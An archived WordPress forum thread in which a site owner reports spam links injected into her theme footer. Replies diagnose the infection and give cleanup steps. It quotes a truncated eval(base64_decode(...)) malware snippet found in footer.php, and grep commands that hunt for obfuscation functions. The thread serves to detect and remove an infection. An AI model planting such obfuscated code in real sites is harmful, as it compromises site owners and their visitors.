Wordpress Themes - WP Forum at BFA

Wordpress Themes - WP Forum at BFA (http://forum.bytesforall.com/index.php)
-   Plugins & Atahualpa (http://forum.bytesforall.com/forumdisplay.php?f=16)
-   -   Theme hacked via contact form 8? (http://forum.bytesforall.com/showthread.php?t=4936)

paulae Dec 18, 2009 04:54 PM

Theme hacked via contact form 8?
Just now, when I viewed my front page with the Chrome browser, there were hundreds of porn site URLs under the footer area! These did not appear in Firefox or Safari. When I looked at the source code, there was a jquery that seemed to have come in via the Contact Form 8 plugin. I let the hosting co. know. They said they this:

Looking at the source pasted, and viewed in a Clean VM using Chrome I do not see any added DIV spam or other code. I did, however, find some code a inside your theme Footer files that do explain this behavior.


Code: <? eval(base64_decode("CmlmIChwcmVnX21hdGNoICgiL1tHZ1 1bT29dW09vXVtHZ11bTGxdW0VlXS8iLCRfU0VSVkVSWyJIVFRQ X1VTRVJfQUdFTlQiXSkpIHsKCWVjaG8gZmlsZV9nZXRfY29udG VudH ....
I disabled the plugin right away. Now I'm not seeing the rogue code anymore. I'm afraid to re-enable it or install another contact form plugin. Help!
NOTE: The support guys removed the base64 code for me, so that's why I didn't see it. I still don't know why this happened.

js9600 Dec 19, 2009 10:11 AM

Good advertisement for TAC I think http://wordpress.org/extend/plugins/tac/

I just tried scanning with Wordpress Exploit Scanner http://wordpress.org/extend/plugins/exploit-scanner/ but it did not pick up added stuff in footer.php. Actually have no idea what it look for, "signs that may indicate that your website has been compromised by hackers" is what users are told - but probably another way to secure/test site.

billy2 Dec 20, 2009 04:12 PM

Sounds like a typical iframe injection.

login via ssh2 and from the wp-content directory run:
find . -type f | xargs grep -i "str_rot13"
find . -type f | xargs grep -i "base64_decode"

That should list your infected files. Replace the infected ones with clean copies.

Then change all your passwords including FTP, CPanel, wp-admin logins, etc.., and make sure you use a tick harder combination.

Then go back and make sure you have the proper file permissions.. I have 0644 on nearly everything except directories which I run at 0755.

For the record I kept Contact Form 7. ;)

All times are GMT -6. The time now is 03:54 AM.

Powered by vBulletin® Copyright ©2000 - 2021, Jelsoft Enterprises Ltd.